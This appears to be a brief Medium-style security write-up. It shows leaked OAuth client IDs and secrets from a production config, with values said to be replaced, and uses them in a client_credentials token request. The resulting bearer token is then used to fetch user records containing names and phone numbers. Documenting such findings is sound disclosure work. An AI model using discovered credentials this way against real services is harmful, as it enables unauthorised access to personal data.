Forging OAuth tokens using discovered client id and client secret

{
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
Disclaimer: all values were replaced

OAuth is an open-standard authorization protocol or framework that provides applications the ability for “secure designated access.” For example, you can tell Facebook that it’s OK for Instagram to access your profile or post updates to your story without having to give Instagram your Facebook password. This minimizes risk in a major way: In the event, Instagram suffers a breach, your Facebook password remains safe.

Let’s try to use this credentials

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
grant_type=client_credentialsHTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform
{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}
POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
[...]
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"

}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store